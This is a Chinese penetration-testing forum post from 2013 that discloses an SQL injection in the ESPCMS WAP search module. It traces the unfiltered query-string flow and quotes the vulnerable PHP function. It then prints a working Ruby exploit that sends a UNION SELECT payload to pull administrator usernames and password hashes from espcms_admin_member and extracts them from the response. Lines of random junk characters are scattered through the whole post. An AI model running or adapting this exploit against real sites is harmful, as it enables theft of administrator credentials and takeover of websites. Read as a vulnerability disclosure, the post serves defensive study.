中国网络渗透测试联盟
标题:
espcms wap模块搜索处SQL注入
[打印本页]
作者:
admin
时间:
2013-7-27 18:31
标题:
espcms wap模块搜索处SQL注入
0×0 漏洞概述0×1 漏洞细节
7 C2 {$ _0 n/ V" D' d3 t8 E
0×2 PoC
+ \( m5 R& @5 |. }& T! Y
! W3 R( p8 w+ u `6 w, d. P
7 O0 `0 s0 {- i @/ f3 ^* X {% N H
# |4 ?( f% K8 }
0×0 漏洞概述
. y: I4 x; h3 W- O$ i- v/ g- B
$ e% }5 T, G7 ~% O- ~, o3 o8 a
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
' i+ o- p2 T) Z3 b" E/ i
其在处理传入的参数时考虑不严谨导致
SQL注入
发生
8 g8 i) K* P2 r; a' b* W+ a
) w! I3 N, H% Q5 c9 M0 ^
8 l7 A* ?; D8 p& F
0×1 漏洞细节
w. R* T. T. P5 p, o
( D0 S) N3 d# U' g5 K1 `% ?
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
( ]: G9 m; c( l) W* c
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
3 l( w* ]2 M' r6 v- c7 T
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的
SQL注入
。
/ r# c4 x% H- e& L# ~
$ _' ?8 w7 M. [
在/interface/3gwap_search.php文件的in_result函数中:
' ~+ {0 l/ @5 B4 E9 q
: r( ]! W* d2 X- Y' v% L
: Q, e7 \- z# d/ S, u+ C
# k& J) A% {+ [# O* I+ D( R/ u
function in_result() {
4 ?. z/ }6 m$ j) n" l9 q0 _1 U
... ... ... ... ... ... ... ... ...
, e) z. N4 E, T/ \9 r( A
$urlcode = $_SERVER[ 'QUERY_STRING '];
! e n) f( ^' i% I }+ @% t; m
parse_str(html_entity_decode($urlcode), $output);
9 |4 J. x9 Q) Y. l3 x0 _
9 W$ [6 @# @+ `9 P
... ... ... ... ... ... ... ... ...
' b, s# H/ P2 X+ M8 O
if (is_array($output['attr' ]) && count($output['attr']) > 0) {
, \0 D9 M( Z) U
+ Q0 I \) O* T' V/ a( X
$db_table = db_prefix . 'model_att';
( H1 h/ \2 s- V5 n
# N' d- h i6 `3 O
foreach ($output['attr' ] as $key => $value) {
/ l$ P9 b$ i. g, B% u( f7 Q
if ($value) {
0 `1 E9 r- N7 F# N
7 @2 j) }% b r8 J c% d9 a7 V
$key = addslashes($key);
) J$ i4 d2 u& j; o& P) q
$key = $this-> fun->inputcodetrim($key);
$ ?' V2 w' j/ u6 P
$db_att_where = " WHERE isclass=1 AND attrname='$key'";
5 d- E t& a Z6 f! K
$countnum = $this->db_numrows($db_table, $db_att_where);
2 |* q# r6 H) Q; U0 q9 ~# s
if ($countnum > 0) {
6 ] j% q' H9 I- x/ H2 O
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
& d. D! a2 s$ F! u0 x/ Z( u7 Z( L
}
( V! J+ m5 d+ V. X& q
}
4 }" p; d+ ]5 t- A2 `' |
}
& p8 f5 M1 `: U- d L9 k0 ^
}
. J1 c5 `$ f6 b- V: {* l# L- }7 w
if (!empty ($keyword) && empty($keyname)) {
; X- }1 G$ U2 _( {: D# b& a
$keyname = 'title';
7 C+ A1 J. Q+ Z* Q) T! T( b
$db_where.= " AND a.title like '%$keyword%'" ;
! L# K# j' B- W! y
} elseif (!empty ($keyword) && !empty($keyname)) {
8 k( N+ _6 [$ |; Z" u
$db_where.= " AND $keyname like '% $keyword%'";
4 x3 W; p4 i1 @, |
}
# ]1 O4 D: r1 E" ^: O9 v0 a: j
$pagemax = 15;
$ ~) O) o7 N& v N- h2 {- m
# x2 f7 F" Q4 z! h' x
$pagesylte = 1;
% g0 O8 k7 V* t2 I6 w/ c
$ e3 [ B1 _2 a1 J# v
if ($countnum > 0) {
- K/ A# M8 M$ T# f! ]2 K+ W9 v
3 N- F0 G9 T+ c0 Z
$numpage = ceil($countnum / $pagemax);
9 l# M8 t; _% l8 Y; U
} else {
$ C+ G8 \( l' s& d8 S7 I1 ]
$numpage = 1;
) D5 b! J/ `% Z. C% h. J9 J
}
; X- D7 G4 q0 q9 R0 b: M5 Z& o8 j# B
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
: ]: Y3 }( u7 O5 h+ }: |
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
$ r8 P. |7 ?9 k/ r7 N- k, a
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
; F6 a$ d: y9 ]. ?, y
... ... ... ... ... ... ... ... ...
6 M. `% f# H( X0 r- t+ O# w
}
, ^) M* r \5 q* g# j6 @ q
; X1 P( o7 G6 O# ]+ i% ]
2 ^, c4 K( ?" ~0 s& N b
0×2 PoC
% A( P! A- |- r& i
- z# O- \ R+ G# Z
: v) Q# D- h/ w! X( L" v/ S+ N
/ m- R, a0 X6 m4 i( L% j, W
require "net/http"
. z% `, T; Z8 c+ }8 q
}5 O' P! c. @1 h5 T* `2 g8 f
def request(method, url)
0 W) Q4 V( N; _! t6 s* g
if method.eql?("get")
, `$ `6 {. C% e5 \; z& K6 b
uri = URI.parse(url)
* p& w4 J9 U3 m5 N& V
http = Net::HTTP.new(uri.host, uri.port)
( M/ k. f+ l% M8 B! v" i# Z
response = http.request(Net::HTTP::Get.new(uri.request_uri))
8 u( c; {8 a& s2 A
return response
7 c# z V9 R. r/ E( K
end
- Z. g6 Y) D& u) w& ]6 G6 G
end
3 n7 |* a: O+ a- |5 I
- s9 Y0 {3 r( \
doc =<<HERE
9 V% E3 S% D' Q3 m1 |+ A7 {$ L
-------------------------------------------------------
1 w) `# a9 e8 @! L+ N6 k
Espcms Injection Exploit
4 l8 }1 o" d9 f3 Y% l/ R
Author:ztz
) ]- I6 ]: ]: a w1 f7 G; x7 V
Blog:
http://ztz.fuzzexp.org/
8 a/ ^. {, s* L# V r. G
-------------------------------------------------------
2 j, s& m/ v- r# F# ]
( H. z# R! J& r4 D2 \
HERE
# y) J) p' X1 G" W& T( m) h- O8 n
& I7 P8 B+ y1 r F0 ~* }+ w M5 A
usage =<<HERE
7 [3 | X+ c6 U# u E% n7 A
Usage: ruby #{$0} host port path
+ Q- U% [ j D& ]; W
example: ruby #{$0}
www.target.com
80 /
; E) M* Z; W1 p) X
HERE
' w, x0 O1 G+ [ m
3 d4 i1 y. a& Q% a7 M1 @5 ~4 g
puts doc
# ]* H# G/ d/ D0 i& T5 {
if ARGV.length < 3
3 s' O1 v/ O; _: c! N
puts usage
+ w/ ^% q1 J, T+ L7 F
else
: C! M/ k; B3 `( Y& @$ s
$host = ARGV[0]
6 W M1 p% o# x
$port = ARGV[1]
& O8 T2 F$ q1 l! \# c. G# Z1 m, J" R
$path = ARGV[2]
$ V& F" ^; T! }5 I8 R8 @! y' l
/ A p9 o$ Q& R; i1 I
puts "
send request..."
( Z. o$ f, Q& h) W: e% @- U7 j
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
& d( D- X1 S0 l5 T% H( X3 Q; E
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
) y1 n* l, x/ l
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
7 g, t1 x7 B! K1 ~" k/ e* i4 A
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
% P" F% ], T/ K
response = request("get", url)
0 [- g$ u0 z8 u9 k( P: S' d
result = response.body.scan(/\w+&\w{32}/)
+ F* [0 ^6 Z! g8 a$ j
puts result
! I& l" [# h6 j
end
) r. J) k( ]3 ~
; w4 i4 u7 [9 E9 T) J) Z& S: A6 X2 @, n. [
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2